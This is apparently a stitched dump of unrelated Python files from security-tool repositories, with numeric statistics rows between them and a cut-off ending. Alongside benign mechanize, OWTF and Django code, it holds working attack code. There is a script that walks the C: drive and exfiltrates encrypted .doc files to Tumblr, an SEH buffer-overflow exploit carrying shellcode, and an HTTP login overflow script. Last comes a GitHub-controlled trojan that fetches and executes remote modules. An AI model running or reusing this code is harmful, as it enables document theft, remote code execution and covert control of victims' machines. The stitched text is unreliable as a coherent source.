        request = self._request(url, data, visit, timeout)
        visit = request.visit
        if visit is None:
            visit = True
        if visit:
            self._visit_request(request, update_history)
        success = True
        try:
            response = UserAgentBase.open(self, request, data)
        except urllib2.HTTPError, error:
            success = False
            if error.fp is None: # not a response
                raise
            response = error
        ## except (IOError, socket.error, OSError), error:
        ##     # Yes, urllib2 really does raise all these :-((
        ##     # See test_urllib2.py for examples of socket.gaierror and OSError,
        ##     # plus note that FTPHandler raises IOError.
        ##     # XXX I don't seem to have an example of exactly socket.error being
        ##     # raised, only socket.gaierror...
        ##     # I don't want to start fixing these here, though, since this is a
        ##     # subclass of OpenerDirector, and it would break old code. Even in
        ##     # Python core, a fix would need some backwards-compat. hack to be
        ##     # acceptable.
        ##     raise
        if visit:
            self._set_response(response, False)
            response = copy.copy(self._response)
        elif response is not None:
            response = _response.upgrade_response(response)
        if not success:
            raise response
        return response
    def __str__(self):
        """Human-readable summary: current URL plus selected form, if any."""
        text = []
        text.append("<%s " % self.__class__.__name__)
        if self._response:
            text.append("visiting %s" % self._response.geturl())
        else:
            text.append("(not visiting a URL)")
        if self.form:
            text.append("\n selected form:\n %s\n" % str(self.form))
        text.append(">")
        return "".join(text)
    def response(self):
        """Return a copy of the current response.
        The returned object has the same interface as the object returned by
        .open() (or mechanize.urlopen()).
        """
        return copy.copy(self._response)
    def open_local_file(self, filename):
        """Open a local file through a file:// URL."""
        path = sanepathname2url(os.path.abspath(filename))
        url = 'file://'+path
        return self.open(url)
    def set_response(self, response):
        """Replace current response with (a copy of) response.
        response may be None.
        This is intended mostly for HTML-preprocessing.
        """
        self._set_response(response, True)
    def _set_response(self, response, close_current):
        # sanity check, necessary but far from sufficient
        if not (response is None or
                (hasattr(response, "info") and hasattr(response, "geturl") and
                 hasattr(response, "read")
                 )
                ):
            raise ValueError("not a response object")
        # A new response invalidates any previously selected form.
        self.form = None
        if response is not None:
            response = _response.upgrade_response(response)
        if close_current and self._response is not None:
            self._response.close()
        self._response = response
        self._factory.set_response(response)
    def visit_response(self, response, request=None):
        """Visit the response, as if it had been .open()ed.
        Unlike .set_response(), this updates history rather than replacing the
        current response.
        """
        if request is None:
            request = _request.Request(response.geturl())
        self._visit_request(request, True)
        self._set_response(response, False)
    def _visit_request(self, request, update_history):
        """Record the current request/response in history before a new visit."""
        if self._response is not None:
            self._response.close()
        if self.request is not None and update_history:
            self._history.add(self.request, self._response)
        self._response = None
        # we want self.request to be assigned even if UserAgentBase.open
        # fails
        self.request = request
    def geturl(self):
        """Get URL of current document."""
        if self._response is None:
            raise BrowserStateError("not viewing any document")
        return self._response.geturl()
    def reload(self):
        """Reload current document, and return response object."""
        if self.request is None:
            raise BrowserStateError("no URL has yet been .open()ed")
        if self._response is not None:
            self._response.close()
        return self._mech_open(self.request, update_history=False)
    def back(self, n=1):
        """Go back n steps in history, and return response object.
        n: go back this number of steps (default 1 step)
        """
        if self._response is not None:
            self._response.close()
        self.request, response = self._history.back(n, self._response)
        self.set_response(response)
        if not response.read_complete:
            return self.reload()
        return copy.copy(response)
    def clear_history(self):
        """Discard all browsing history."""
        self._history.clear()
    def set_cookie(self, cookie_string):
        """Request to set a cookie.
        Note that it is NOT necessary to call this method under ordinary
        circumstances: cookie handling is normally entirely automatic. The
        intended use case is rather to simulate the setting of a cookie by
        client script in a web page (e.g. JavaScript). In that case, use of
        this method is necessary because mechanize currently does not support
        JavaScript, VBScript, etc.
        The cookie is added in the same way as if it had arrived with the
        current response, as a result of the current request. This means that,
        for example, if it is not appropriate to set the cookie based on the
        current request, no cookie will be set.
        The cookie will be returned automatically with subsequent responses
        made by the Browser instance whenever that's appropriate.
        cookie_string should be a valid value of the Set-Cookie header.
        For example:
        browser.set_cookie(
        "sid=abcdef; expires=Wednesday, 09-Nov-06 23:12:40 GMT")
        Currently, this method does not allow for adding RFC 2986 cookies.
        This limitation will be lifted if anybody requests it.
        """
        if self._response is None:
            raise BrowserStateError("not viewing any document")
        if self.request.get_type() not in ["http", "https"]:
            raise BrowserStateError("can't set cookie for non-HTTP/HTTPS "
                                    "transactions")
        cookiejar = self._ua_handlers["_cookies"].cookiejar
        response = self.response() # copy
        headers = response.info()
        headers["Set-cookie"] = cookie_string
        cookiejar.extract_cookies(response, self.request)
    def links(self, **kwds):
        """Return iterable over links (mechanize.Link objects)."""
        if not self.viewing_html():
            raise BrowserStateError("not viewing HTML")
        links = self._factory.links()
        if kwds:
            return self._filter_links(links, **kwds)
        else:
            return links
    def forms(self):
        """Return iterable over forms.
        The returned form objects implement the mechanize.HTMLForm interface.
        """
        if not self.viewing_html():
            raise BrowserStateError("not viewing HTML")
        return self._factory.forms()
    def global_form(self):
        """Return the global form object, or None if the factory implementation
        did not supply one.
        The "global" form object contains all controls that are not descendants
        of any FORM element.
        The returned form object implements the mechanize.HTMLForm interface.
        This is a separate method since the global form is not regarded as part
        of the sequence of forms in the document -- mostly for
        backwards-compatibility.
        """
        if not self.viewing_html():
            raise BrowserStateError("not viewing HTML")
        return self._factory.global_form
    def viewing_html(self):
        """Return whether the current response contains HTML data."""
        if self._response is None:
            raise BrowserStateError("not viewing any document")
        return self._factory.is_html
    def encoding(self):
        """Return the character encoding of the current response."""
        if self._response is None:
            raise BrowserStateError("not viewing any document")
        return self._factory.encoding
    def title(self):
        r"""Return title, or None if there is no title element in the document.
        Treatment of any tag children of attempts to follow Firefox and IE
        (currently, tags are preserved).
        """
        if not self.viewing_html():
            raise BrowserStateError("not viewing HTML")
        return self._factory.title
    def select_form(self, name=None, predicate=None, nr=None):
        """Select an HTML form for input.
        This is a bit like giving a form the "input focus" in a browser.
        If a form is selected, the Browser object supports the HTMLForm
        interface, so you can call methods like .set_value(), .set(), and
        .click().
        Another way to select a form is to assign to the .form attribute. The
        form assigned should be one of the objects returned by the .forms()
        method.
        At least one of the name, predicate and nr arguments must be supplied.
        If no matching form is found, mechanize.FormNotFoundError is raised.
        If name is specified, then the form must have the indicated name.
        If predicate is specified, then the form must match that function. The
        predicate function is passed the HTMLForm as its single argument, and
        should return a boolean value indicating whether the form matched.
        nr, if supplied, is the sequence number of the form (where 0 is the
        first). Note that control 0 is the first form matching all the other
        arguments (if supplied); it is not necessarily the first control in the
        form. The "global form" (consisting of all form controls not contained
        in any FORM element) is considered not to be part of this sequence and
        to have no name, so will not be matched unless both name and nr are
        None.
        """
        if not self.viewing_html():
            raise BrowserStateError("not viewing HTML")
        if (name is None) and (predicate is None) and (nr is None):
            raise ValueError(
                "at least one argument must be supplied to specify form")
        global_form = self._factory.global_form
        if nr is None and name is None and \
               predicate is not None and predicate(global_form):
            self.form = global_form
            return
        orig_nr = nr
        for form in self.forms():
            if name is not None and name != form.name:
                continue
            if predicate is not None and not predicate(form):
                continue
            if nr:
                nr -= 1
                continue
            self.form = form
            break # success
        else:
            # failure
            description = []
            if name is not None: description.append("name '%s'" % name)
            if predicate is not None:
                description.append("predicate %s" % predicate)
            if orig_nr is not None: description.append("nr %d" % orig_nr)
            description = ", ".join(description)
            raise FormNotFoundError("no form matching "+description)
    def click(self, *args, **kwds):
        """See mechanize.HTMLForm.click for documentation."""
        if not self.viewing_html():
            raise BrowserStateError("not viewing HTML")
        request = self.form.click(*args, **kwds)
        return self._add_referer_header(request)
    def submit(self, *args, **kwds):
        """Submit current form.
        Arguments are as for mechanize.HTMLForm.click().
        Return value is same as for Browser.open().
        """
        return self.open(self.click(*args, **kwds))
    def click_link(self, link=None, **kwds):
        """Find a link and return a Request object for it.
        Arguments are as for .find_link(), except that a link may be supplied
        as the first argument.
        """
        if not self.viewing_html():
            raise BrowserStateError("not viewing HTML")
        if not link:
            link = self.find_link(**kwds)
        else:
            if kwds:
                raise ValueError(
                    "either pass a Link, or keyword arguments, not both")
        request = self.request_class(link.absolute_url)
        return self._add_referer_header(request)
    def follow_link(self, link=None, **kwds):
        """Find a link and .open() it.
        Arguments are as for .click_link().
        Return value is same as for Browser.open().
        """
        return self.open(self.click_link(link, **kwds))
    def find_link(self, **kwds):
        """Find a link in current page.
        Links are returned as mechanize.Link objects.
        # Return third link that .search()-matches the regexp "python"
        # (by ".search()-matches", I mean that the regular expression method
        # .search() is used, rather than .match()).
        find_link(text_regex=re.compile("python"), nr=2)
        # Return first http link in the current page that points to somewhere
        # on python.org whose link text (after tags have been removed) is
        # exactly "monty python".
        find_link(text="monty python",
        url_regex=re.compile("http.*python.org"))
        # Return first link with exactly three HTML attributes.
        find_link(predicate=lambda link: len(link.attrs) == 3)
        Links include anchors (<a>), image maps (<area>), and frames (<frame>,
        <iframe>).
        All arguments must be passed by keyword, not position. Zero or more
        arguments may be supplied. In order to find a link, all arguments
        supplied must match.
        If a matching link is not found, mechanize.LinkNotFoundError is raised.
        text: link text between link tags: e.g. <a href="blah">this bit</a> (as
        returned by pullparser.get_compressed_text(), ie. without tags but
        with opening tags "textified" as per the pullparser docs) must compare
        equal to this argument, if supplied
        text_regex: link text between tag (as defined above) must match the
        regular expression object or regular expression string passed as this
        argument, if supplied
        name, name_regex: as for text and text_regex, but matched against the
        name HTML attribute of the link tag
        url, url_regex: as for text and text_regex, but matched against the
        URL of the link tag (note this matches against Link.url, which is a
        relative or absolute URL according to how it was written in the HTML)
        tag: element name of opening tag, e.g. "a"
        predicate: a function taking a Link object as its single argument,
        returning a boolean result, indicating whether the links
        nr: matches the nth link that matches all other criteria (default 0)
        """
        try:
            return self._filter_links(self._factory.links(), **kwds).next()
        except StopIteration:
            raise LinkNotFoundError()
    def __getattr__(self, name):
        # pass through _form.HTMLForm methods and attributes
        form = self.__dict__.get("form")
        if form is None:
            raise AttributeError(
                "%s instance has no attribute %s (perhaps you forgot to "
                ".select_form()?)" % (self.__class__, name))
        return getattr(form, name)
    def _filter_links(self, links,
                      text=None, text_regex=None,
                      name=None, name_regex=None,
                      url=None, url_regex=None,
                      tag=None,
                      predicate=None,
                      nr=0
                      ):
        """Generator yielding the links that match all supplied criteria."""
        if not self.viewing_html():
            raise BrowserStateError("not viewing HTML")
        orig_nr = nr
        for link in links:
            if url is not None and url != link.url:
                continue
            if url_regex is not None and not re.search(url_regex, link.url):
                continue
            if (text is not None and
                (link.text is None or text != link.text)):
                continue
            if (text_regex is not None and
                (link.text is None or not re.search(text_regex, link.text))):
                continue
            if name is not None and name != dict(link.attrs).get("name"):
                continue
            if name_regex is not None:
                link_name = dict(link.attrs).get("name")
                if link_name is None or not re.search(name_regex, link_name):
                    continue
            if tag is not None and tag != link.tag:
                continue
            if predicate is not None and not predicate(link):
                continue
            if nr:
                nr -= 1
                continue
            yield link
            nr = orig_nr
| 36.189552 | 82 | 0.60419 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
    """Render the online resource link list that assists manual testing."""
    resources = get_resources("ExternalErrorCodes")
    return plugin_helper.resource_linklist("Online Resources", resources)
| 27.454545 | 75 | 0.778846 |
owtf | """
PASSIVE Plugin for Testing for Open Amazon S3 Buckets(OWASP-CL-001)
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "GrayhatWarfare for Public S3 Buckets"
def run(PluginInfo):
    """Render GrayhatWarfare links for public S3 buckets of the target domain."""
    resource = get_resources("PassiveOpenS3Buckets")
    # Grayhat Warfare works better when we search by Second Level Domain,
    # so strip the TLD off the configured domain before building the links.
    domain = resource[0][1]
    resource[0][1] = domain.rsplit(".", 1)[0]
    return plugin_helper.resource_linklist("Online Resources", resource)
| 27.130435 | 76 | 0.727554 |
owtf | """
tests.functional.cli.test_only
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from tests.owtftest import OWTFCliTestCase
class OWTFCliOnlyPluginsTest(OWTFCliTestCase):
    """Functional tests for the CLI '-o' option (run only the named plugin)."""
    categories = ["cli", "fast"]
    def test_only_one_plugin(self):
        """Run OWTF with only one plugin."""
        self.run_owtf(
            "-s",
            "-o",
            "OWTF-WVS-001",
            "%s://%s:%s" % (self.PROTOCOL, self.IP, self.PORT),
        )
        # Test WVS-001 active AND external were run.
        self.assert_is_in_logs(
            "Target: %s://%s:%s -> Plugin: Arachni Unauthenticated (web/active)"
            % (self.PROTOCOL, self.IP, self.PORT),
            name="Worker",
            msg="Arachni web active plugin should have been run!",
        )
        self.assert_is_in_logs(
            "Target: %s://%s:%s -> Plugin: Arachni Unauthenticated (web/external)"
            % (self.PROTOCOL, self.IP, self.PORT),
            name="Worker",
            msg="Arachni web external plugin should have been run!",
        )
        # Test that no other plugin has been run.
        self.assert_is_not_in_logs(
            "3 - Target:", name="Worker", msg="No other plugins should have been run!"
        )
        # Test OWTF exited cleanly
        self.assert_is_in_logs(
            "All jobs have been done. Exiting.",
            name="MainProcess",
            msg="OWTF did not finish properly!",
        )
    def test_only_one_plugin_one_type(self):
        """Run OWTF with only one external plugin (regression #376)."""
        self.run_owtf(
            "-s",
            "-o",
            "OWTF-WVS-001",
            "-t",
            "external",
            "%s://%s:%s" % (self.PROTOCOL, self.IP, self.PORT),
        )
        # Test WVS-001 external were run.
        self.assert_is_in_logs(
            "Target: %s://%s:%s -> Plugin: Arachni Unauthenticated (web/external)"
            % (self.PROTOCOL, self.IP, self.PORT),
            name="Worker",
            msg="Arachni web external plugin should have been run!",
        )
        # Test that no other plugin has been run.
        self.assert_is_not_in_logs(
            "2 - Target:", name="Worker", msg="No other plugin should have been run!"
        )
        # Test OWTF exited cleanly
        self.assert_is_in_logs(
            "All jobs have been done. Exiting.",
            name="MainProcess",
            msg="OWTF did not finish properly!",
        )
| 33 | 86 | 0.51982 |
PenetrationTestingScripts | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-07 22:23
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django's makemigrations: creates the NmapScan table
    # (target, command line, and start/end timestamps of a scan run).
    # NOTE: applied migrations should not be edited by hand.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='NmapScan',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('target_text', models.CharField(max_length=1024)),
                ('cmd_text', models.CharField(max_length=256)),
                ('start_date', models.DateTimeField(verbose_name='date started')),
                ('end_date', models.DateTimeField(verbose_name='date end')),
            ],
        ),
    ]
| 28.074074 | 114 | 0.577806 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
import socket
# Overflow layout: 780 filler bytes up to the saved return address,
# 4 bytes that overwrite EIP, then padding out to 1000 bytes total.
junk = 'A'*780
eip = 'B'*4
pad = 'C'*(1000-780-4)
injection = junk + eip + pad
# The overflow is delivered through the 'username' field of the login form.
payload="username="+injection+"&password=A"
# Hand-built HTTP POST request; Content-Length must match the payload size.
buffer="POST /login HTTP/1.1\r\n"
buffer+="Host: 192.168.129.128\r\n"
buffer+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Referer: http://192.168.129.128/login\r\n"
buffer+="Connection: close\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: "+str(len(payload))+"\r\n"
buffer+="\r\n"
buffer+=payload
# Fire the raw request at the target web server and close the connection.
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.129.128", 80))
s.send(buffer)
s.close()
owtf | """
GREP Plugin for Vulnerable Remember Password and Pwd Reset (OWASP-AT-006)
NOTE: GREP plugins do NOT send traffic to the target and only grep the HTTP Transaction Log
"""
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Searches transaction DB for autocomplete protections"
def run(PluginInfo):
    """Grep the transaction DB for password/form tags to review autocomplete."""
    intro = "This plugin looks for password and form tags to review the autocomplete attribute<br />"
    output = plugin_helper.HtmlString(intro)
    output += plugin_helper.FindResponseBodyMatchesForRegexpName(
        "RESPONSE_REGEXP_FOR_AUTOCOMPLETE"
    )
    return output
| 34.058824 | 101 | 0.761345 |
cybersecurity-penetration-testing | import win32com.client
import os
import fnmatch
import time
import random
import zlib
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
doc_type = ".doc"  # only files matching this extension are targeted
# Tumblr credentials used by the automated browser session.
username = "test@test.com"
password = "testpassword"
# RSA public key: documents are encrypted client-side so only the holder of
# the matching private key can decrypt the exfiltrated posts.
public_key = """-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyXUTgFoL/2EPKoN31l5T
lak7VxhdusNCWQKDfcN5Jj45GQ1oZZjsECQ8jK5AaQuCWdmEQkgCEV23L2y71G+T
h/zlVPjp0hgC6nOKOuwmlQ1jGvfVvaNZ0YXrs+sX/wg5FT/bTS4yzXeW6920tdls
2N7Pu5N1FLRW5PMhk6GW5rzVhwdDvnfaUoSVj7oKaIMLbN/TENvnwhZZKlTZeK79
ix4qXwYLe66CrgCHDf4oBJ/nO1oYwelxuIXVPhIZnVpkbz3IL6BfEZ3ZDKzGeRs6
YLZuR2u5KUbr9uabEzgtrLyOeoK8UscKmzOvtwxZDcgNijqMJKuqpNZczPHmf9cS
1wIDAQAB
-----END PUBLIC KEY-----"""
def wait_for_browser(browser):
    """Poll the IE COM object until it reports the page has finished loading."""
    finished_states = (4, "complete")
    while browser.ReadyState not in finished_states:
        time.sleep(0.1)
    return
def encrypt_string(plaintext):
    """Compress `plaintext` with zlib, RSA/OAEP-encrypt it in fixed-size
    chunks with the module-level public key, and return the base64-encoded
    ciphertext (Python 2 str.encode("base64"))."""
    chunk_size = 256
    print "Compressing: %d bytes" % len(plaintext)
    plaintext = zlib.compress(plaintext)
    print "Encrypting %d bytes" % len(plaintext)
    # Build an OAEP cipher object around the imported public key.
    rsakey = RSA.importKey(public_key)
    rsakey = PKCS1_OAEP.new(rsakey)
    encrypted = ""
    offset = 0
    while offset < len(plaintext):
        # NOTE(review): literal 256 should be chunk_size for consistency
        # (same value today, but they can drift apart).
        chunk = plaintext[offset:offset+256]
        # Pad the final short chunk with spaces up to chunk_size.
        if len(chunk) % chunk_size != 0:
            chunk += " " * (chunk_size - len(chunk))
        # NOTE(review): RSA-2048 OAEP limits each message to ~214 bytes;
        # encrypting 256-byte chunks raises ValueError under PyCryptodome —
        # confirm the intended library/key size before relying on this.
        encrypted += rsakey.encrypt(chunk)
        offset += chunk_size
    encrypted = encrypted.encode("base64")
    print "Base64 encoded crypto: %d" % len(encrypted)
    return encrypted
def encrypt_post(filename):
    """Prepare a document for posting.

    Returns a (title, body) pair: the title is the encrypted file path and
    the body is the encrypted raw file contents, both produced by
    encrypt_string().
    """
    with open(filename, "rb") as handle:
        raw_contents = handle.read()
    return encrypt_string(filename), encrypt_string(raw_contents)
def random_sleep():
    """Pause 5-10 seconds at random so the browser automation looks human-paced."""
    pause = random.randint(5, 10)
    time.sleep(pause)
    return
def login_to_tumblr(ie):
    """Fill in and submit Tumblr's login form through the IE COM object.

    Uses the module-level `username`/`password`; waits for the resulting
    page load before returning.
    """
    # retrieve all elements in the document
    full_doc = ie.Document.all
    # fill the e-mail and password fields wherever they appear
    for i in full_doc:
        if i.id == "signup_email":
            i.setAttribute("value",username)
        elif i.id == "signup_password":
            i.setAttribute("value",password)
    random_sleep()
    # you can be presented with different homepages
    try:
        # submit whichever form is the signup/login form on this variant
        if ie.Document.forms[0].id == "signup_form":
            ie.Document.forms[0].submit()
        else:
            ie.Document.forms[1].submit()
    except IndexError, e:
        # fewer forms than expected on this page variant — best-effort, move on
        pass
    random_sleep()
    # wait for the post-login page to finish loading
    wait_for_browser(ie)
    return
def post_to_tumblr(ie,title,post):
    """Create a new text post on Tumblr via the IE COM object.

    Fills the title box (`post_one`) and body (`post_two`), then clicks the
    create-post button (`create_post`).
    NOTE(review): if any of those element IDs is missing from the page,
    `title_box`/`post_form` are never bound and the code below raises
    NameError — confirm against the current Tumblr markup.
    """
    full_doc = ie.Document.all
    for i in full_doc:
        if i.id == "post_one":
            i.setAttribute("value",title)
            title_box = i
            i.focus()
        elif i.id == "post_two":
            i.setAttribute("innerHTML",post)
            print "Set text area"
            i.focus()
        elif i.id == "create_post":
            print "Found post button"
            post_form = i
            i.focus()
    # move focus away from the main content box
    random_sleep()
    title_box.focus()
    random_sleep()
    # post the form
    post_form.children[0].click()
    wait_for_browser(ie)
    random_sleep()
    return
def exfiltrate(document_path):
    """Exfiltrate one document by posting its encrypted contents to Tumblr.

    Drives a visible Internet Explorer instance end to end: log in, open
    the new-text-post page, encrypt the file, publish, then tear down IE.
    """
    ie = win32com.client.Dispatch("InternetExplorer.Application")
    # Visible = 1 shows the browser window (useful for debugging; stealthier
    # variants would hide it).
    ie.Visible = 1
    # head to tumblr and login
    ie.Navigate("http://www.tumblr.com/login")
    wait_for_browser(ie)
    print "Logging in..."
    login_to_tumblr(ie)
    print "Logged in...navigating"
    ie.Navigate("https://www.tumblr.com/new/text")
    wait_for_browser(ie)
    # encrypt the file path (title) and contents (body)
    title,body = encrypt_post(document_path)
    print "Creating new post..."
    post_to_tumblr(ie,title,body)
    print "Posted!"
    # Destroy the IE instance
    ie.Quit()
    ie = None
    return
# Main loop: walk the entire C: drive, and for every file whose name matches
# the target extension (doc_type), exfiltrate it via Tumblr. raw_input pauses
# between documents so the operator can supervise each post (Python 2 only).
for parent, directories, filenames in os.walk("C:\\"):
    for filename in fnmatch.filter(filenames,"*%s" % doc_type):
        document_path = os.path.join(parent,filename)
        print "Found: %s" % document_path
        exfiltrate(document_path)
        raw_input("Continue?")
Penetration-Testing-with-Shellcode | #!/usr/bin/python
import socket
# SEH-based stack overflow exploit: overflow the request buffer, overwrite the
# SEH record, and redirect execution into the shellcode below.
# Filler to reach the SEH record on the stack (offset found via fuzzing).
junk = 'A'*4061
# next-SEH: short jump (EB 10) over the SEH pointer into the NOP sled.
nSEH='\xeb\x10\x90\x90'
# SEH handler overwrite: address of a POP/POP/RET gadget (0x100101bf,
# little-endian) in a non-SafeSEH module — TODO confirm module/gadget.
SEH = '\xbf\xa1\x01\x10'
# NOP sled so the jump can land anywhere before the shellcode.
NOPs='\x90'*20
# msfvenom-style encoded shellcode payload (opaque bytes; do not edit).
buf = ""
buf += "\xd9\xf6\xd9\x74\x24\xf4\x58\x31\xc9\xb1\x53\xbb\xbb"
buf += "\x75\x92\x5d\x31\x58\x17\x83\xe8\xfc\x03\xe3\x66\x70"
buf += "\xa8\xef\x61\xf6\x53\x0f\x72\x97\xda\xea\x43\x97\xb9"
buf += "\x7f\xf3\x27\xc9\x2d\xf8\xcc\x9f\xc5\x8b\xa1\x37\xea"
buf += "\x3c\x0f\x6e\xc5\xbd\x3c\x52\x44\x3e\x3f\x87\xa6\x7f"
buf += "\xf0\xda\xa7\xb8\xed\x17\xf5\x11\x79\x85\xe9\x16\x37"
buf += "\x16\x82\x65\xd9\x1e\x77\x3d\xd8\x0f\x26\x35\x83\x8f"
buf += "\xc9\x9a\xbf\x99\xd1\xff\xfa\x50\x6a\xcb\x71\x63\xba"
buf += "\x05\x79\xc8\x83\xa9\x88\x10\xc4\x0e\x73\x67\x3c\x6d"
buf += "\x0e\x70\xfb\x0f\xd4\xf5\x1f\xb7\x9f\xae\xfb\x49\x73"
buf += "\x28\x88\x46\x38\x3e\xd6\x4a\xbf\x93\x6d\x76\x34\x12"
buf += "\xa1\xfe\x0e\x31\x65\x5a\xd4\x58\x3c\x06\xbb\x65\x5e"
buf += "\xe9\x64\xc0\x15\x04\x70\x79\x74\x41\xb5\xb0\x86\x91"
buf += "\xd1\xc3\xf5\xa3\x7e\x78\x91\x8f\xf7\xa6\x66\xef\x2d"
buf += "\x1e\xf8\x0e\xce\x5f\xd1\xd4\x9a\x0f\x49\xfc\xa2\xdb"
buf += "\x89\x01\x77\x71\x81\xa4\x28\x64\x6c\x16\x99\x28\xde"
buf += "\xff\xf3\xa6\x01\x1f\xfc\x6c\x2a\x88\x01\x8f\x44\xa8"
buf += "\x8f\x69\x0e\x3a\xc6\x22\xa6\xf8\x3d\xfb\x51\x02\x14"
buf += "\x53\xf5\x4b\x7e\x64\xfa\x4b\x54\xc2\x6c\xc0\xbb\xd6"
buf += "\x8d\xd7\x91\x7e\xda\x40\x6f\xef\xa9\xf1\x70\x3a\x59"
buf += "\x91\xe3\xa1\x99\xdc\x1f\x7e\xce\x89\xee\x77\x9a\x27"
buf += "\x48\x2e\xb8\xb5\x0c\x09\x78\x62\xed\x94\x81\xe7\x49"
buf += "\xb3\x91\x31\x51\xff\xc5\xed\x04\xa9\xb3\x4b\xff\x1b"
buf += "\x6d\x02\xac\xf5\xf9\xd3\x9e\xc5\x7f\xdc\xca\xb3\x9f"
buf += "\x6d\xa3\x85\xa0\x42\x23\x02\xd9\xbe\xd3\xed\x30\x7b"
buf += "\xe3\xa7\x18\x2a\x6c\x6e\xc9\x6e\xf1\x91\x24\xac\x0c"
buf += "\x12\xcc\x4d\xeb\x0a\xa5\x48\xb7\x8c\x56\x21\xa8\x78"
buf += "\x58\x96\xc9\xa8"
# Assemble: filler | nSEH jump | handler address | sled | shellcode.
injection = junk + nSEH + SEH + NOPs + buf
# Deliver the payload as the path of a bogus GET request and disconnect.
# NOTE(review): s.send(str) is Python 2 only; Python 3 requires bytes.
s = socket.socket()
s.connect(('192.168.129.128',80))
s.send("GET " + injection + " HTTP/1.0\r\n\r\n")
s.close()
| 43.066667 | 61 | 0.665994 |
cybersecurity-penetration-testing | import socket
# Minimal TCP connect scanner against localhost (Python 2: print statement).
rmip ='127.0.0.1'
# Ports to probe (common services: SSH, Telnet, HTTP, VMware, RPC, SMB, FTP-data).
portlist = [22,23,80,912,135,445,20]
for port in portlist:
    sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    # connect_ex returns 0 when the port accepts the connection,
    # otherwise an errno value — no exception is raised.
    result = sock.connect_ex((rmip,port))
    print port,":", result
    sock.close()
| 18 | 55 | 0.700441 |
Hands-On-Penetration-Testing-with-Python | """
This file demonstrates writing tests using the unittest module. These will pass
when you run "manage.py test".
Replace this with more appropriate tests for your application.
"""
from django.test import TestCase
class SimpleTest(TestCase):
    """Placeholder Django test case; replace with real tests for the app."""

    def test_basic_addition(self):
        """Sanity check: 1 + 1 must equal 2."""
        total = 1 + 1
        self.assertEqual(total, 2)
| 21.588235 | 79 | 0.67624 |
cybersecurity-penetration-testing | import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
import os
from github3 import login
# Identifier for this trojan instance; selects its config file and data
# directory inside the command-and-control GitHub repository.
trojan_id = "abc"
# Remote JSON file holding this instance's task list.
trojan_config = "%s.json" % trojan_id
# Repo directory where module results are committed.
data_path = "data/%s/" % trojan_id
# NOTE(review): appears unused in this file — confirm before removing.
trojan_modules= []
# A token sits in the queue while a worker thread runs; the main loop
# polls emptiness to decide when to fetch a fresh config.
task_queue = Queue.Queue()
# Flips to True once the config has been fetched; gates GitImporter lookups.
configured = False
class GitImporter(object):
    """Meta-path import hook that fetches missing modules from the C2 repo.

    When an import fails locally (and the trojan is configured), the module
    source is pulled from modules/<name> in the GitHub repository, decoded,
    and executed into a fresh module object (Python 2 syntax).
    """
    def __init__(self):
        # Base64-decoded source of the module most recently located.
        self.current_module_code = ""
    def find_module(self,fullname,path=None):
        # Only attempt remote resolution after the config has been fetched.
        if configured:
            print "[*] Attempting to retrieve %s" % fullname
            new_library = get_file_contents("modules/%s" % fullname)
            if new_library is not None:
                # Stash the decoded source; load_module() executes it.
                self.current_module_code = base64.b64decode(new_library)
                return self
        return None
    def load_module(self,name):
        # Execute the fetched source in a brand-new module namespace and
        # register it so subsequent imports find it in sys.modules.
        module = imp.new_module(name)
        exec self.current_module_code in module.__dict__
        sys.modules[name] = module
        return module
def connect_to_github():
    """Authenticate to GitHub and return the (session, repo, branch) triple
    for the command-and-control repository's master branch."""
    session = login(username="blackhatpythonbook",password="justin1234")
    repository = session.repository("blackhatpythonbook","chapter7")
    master = repository.branch("master")
    return session,repository,master
def get_file_contents(filepath):
    """Return the base64 blob content of `filepath` from the C2 repo,
    or None when no tree entry matches.

    Walks the full recursive tree of the master branch.
    NOTE(review): the substring test (`filepath in filename.path`) can match
    an unintended file whose path merely contains `filepath` — confirm paths
    in the repo are unambiguous.
    """
    gh,repo,branch = connect_to_github()
    tree = branch.commit.commit.tree.recurse()
    for filename in tree.tree:
        if filepath in filename.path:
            print "[*] Found file %s" % filepath
            blob = repo.blob(filename._json_data['sha'])
            return blob.content
    return None
def get_trojan_config():
    """Fetch and decode this trojan's JSON task list from the C2 repo.

    Marks the importer as configured, then imports any task module not
    already loaded — the GitImporter meta-path hook resolves those from
    the remote repository. Returns the decoded task list.
    """
    global configured
    raw = get_file_contents(trojan_config)
    tasks = json.loads(base64.b64decode(raw))
    configured = True
    for task in tasks:
        module_name = task['module']
        if module_name not in sys.modules:
            exec("import %s" % module_name)
    return tasks
def store_module_result(data):
    """Commit a module's output to the C2 repo as base64 under
    data/<trojan_id>/<random>.data."""
    _, repo, _ = connect_to_github()
    result_name = "%d.data" % random.randint(1000,100000)
    remote_path = "data/%s/%s" % (trojan_id, result_name)
    repo.create_file(remote_path,"Commit message",base64.b64encode(data))
    return
def module_runner(module):
    """Run one task module's run() and upload its output to the repo.

    A token sits in task_queue for the duration of the call so the main
    loop can tell that a worker thread is still busy.
    NOTE(review): the token is never removed if run() raises — confirm
    whether that stall is intended.
    """
    task_queue.put(1)
    output = sys.modules[module].run()
    task_queue.get()
    store_module_result(output)
    return
# Main trojan loop: install the GitHub-backed import hook, then forever
